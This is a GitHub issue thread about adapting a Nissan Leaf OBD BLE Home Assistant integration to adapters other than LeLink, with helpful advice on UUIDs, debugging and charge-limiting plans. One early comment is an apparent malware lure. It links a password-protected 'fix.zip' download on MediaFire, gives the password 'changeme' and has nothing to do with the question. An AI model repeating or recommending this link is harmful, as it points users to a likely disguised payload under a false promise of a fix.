### ISSUE TITLE
How to use other adapter than Lelink2 BLE

### ISSUE THREAD

**Issue by fototakas** [pbutterworth/nissan-leaf-obd-ble#1]
Hello,
Thanks for sharing this project.
Is it possible to use other BLE adapter than LeLink?
What should I change in the code to adopt it to the different OBD BLE adapter?

**Comment by Qsgz2023ji5ban** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by pb-asbuilt** [comment]
You need to find out what UUIDs your BLE adapter is using.
You can use the nRF Connect app for your phone to get this.

Once you know the service UUID, go and change it in here:
https://github.com/pbutterworth/nissan-leaf-obd-ble/blob/ced5d9cced29acbbcb85f2ba1ea71443af207476/custom_components/nissan_leaf_obd_ble/manifest.json#L14
and here:
https://github.com/pbutterworth/nissan-leaf-obd-ble/blob/ced5d9cced29acbbcb85f2ba1ea71443af207476/custom_components/nissan_leaf_obd_ble/elm327.py#L65

You will also need to find out the characteristic UUID used for command/response, and put this here:
https://github.com/pbutterworth/nissan-leaf-obd-ble/blob/ced5d9cced29acbbcb85f2ba1ea71443af207476/custom_components/nissan_leaf_obd_ble/elm327.py#L66

Other BLE devices might use a separate UUID for reading vs writing (just guessing). You would need to extent bleserial.py to handle a separate UUID for read and write.

**Comment by fototakas** [comment]
Thanks for explanations. Your guess was correct, my 2 OBD adapters have separate UUID's for reading and writing.
Those OBD2 adapters I have are dual bluetooth - standard and BLE.  As I'm not a programer bleserial.py rewrite is mission imposible :)

**Comment by Arquiteto** [comment]
As LeLink is not so easy to aquire where I live I ordered Vgate that as well has 2 separate characteristic UUID. I modified the code to account for that. #2

I am not 100% positive that my solution is enough. It seems to partially work, but the sensors become unavailable very often, some parameters are read OK, but for example for SoC I didn't get any read while the Leaf was charging and when I turned the "ignition" on as 1074%, 1159% and then 1592%. I will take take a look at it tommorow.

@pb-asbuilt which Nissan Leaf are you using? Maybe different Leafs have slightly different commands or responses?

**Comment by huenemeca** [comment]
"You will also need to find out the characteristic UUID used for command/response, and put this here:"
Can this be found with the nRF app also?  If so how?

**Comment by pbutterworth** [comment]
> As LeLink is not so easy to aquire where I live I ordered Vgate that as well has 2 separate characteristic UUID. I modified the code to account for that. #2
> 
> I am not 100% positive that my solution is enough. It seems to partially work, but the sensors become unavailable very often, some parameters are read OK, but for example for SoC I didn't get any read while the Leaf was charging and when I turned the "ignition" on as 1074%, 1159% and then 1592%. I will take take a look at it tommorow.
> 
> @pb-asbuilt which Nissan Leaf are you using? Maybe different Leafs have slightly different commands or responses?

Sorry been a bit distracted - thought I had better get back to responding!
I have a 2021 ze1 62kWh.
There are definitely some differences between models. Documentation is extremely sparse. Turn on the debug logging for this integration and you will get a lot more insight into what's going on; including why the data is going unavailable.

**Comment by pbutterworth** [comment]
> "You will also need to find out the characteristic UUID used for command/response, and put this here:" Can this be found with the nRF app also? If so how?

Technically, this should be possible. Although I just tried it on my iPhone, and it only reports the first 4 digits of the UUID for some reason. Try it anyway (using nRF Connect) and paste screenshots of what you get back here.

**Comment by huenemeca** [comment]
Yeah, I was hoping to get SOC while it is charging so I can shut it off when the car is around 80%.  But I can't read it even when charging if the car is off.  Very disappointing.

**Comment by dlarue** [comment]
@huenemeca I recently opened up LeafSpy while walking out to the 2017 Leaf charging and was surprised to see the SOC before I even opened the door.  The car has an LELink OBDII interface so it should be possible. My goal is the same as yours, to setup a notification system first and then setup an MQTT outlet controller to automate the process.

Have you progressed any since Nov 2024?

**Comment by dlarue** [comment]
Just to update, I regularly will plug my charger into the 2017 Leaf, set the Smart plug and python code to start the charging(MQTT to the smart plug) and then I unlock the door from inside the house to get the SOC from LeafSpy and set the charge timeout.

I just setup Home Assistant to monitor our solar system and batteries and have a ESP32 board with RS485 and CAN interface talking to the solar inverter and battery system. Now I should re-look at this project to see how to get it setup(on a ESP32? ) talking via BLE to the Leaf so I can integrate a charge-to-80% solution. Instead of always having to get my the door and start LeafSpy then back to the computer to reset the python charge limiter.
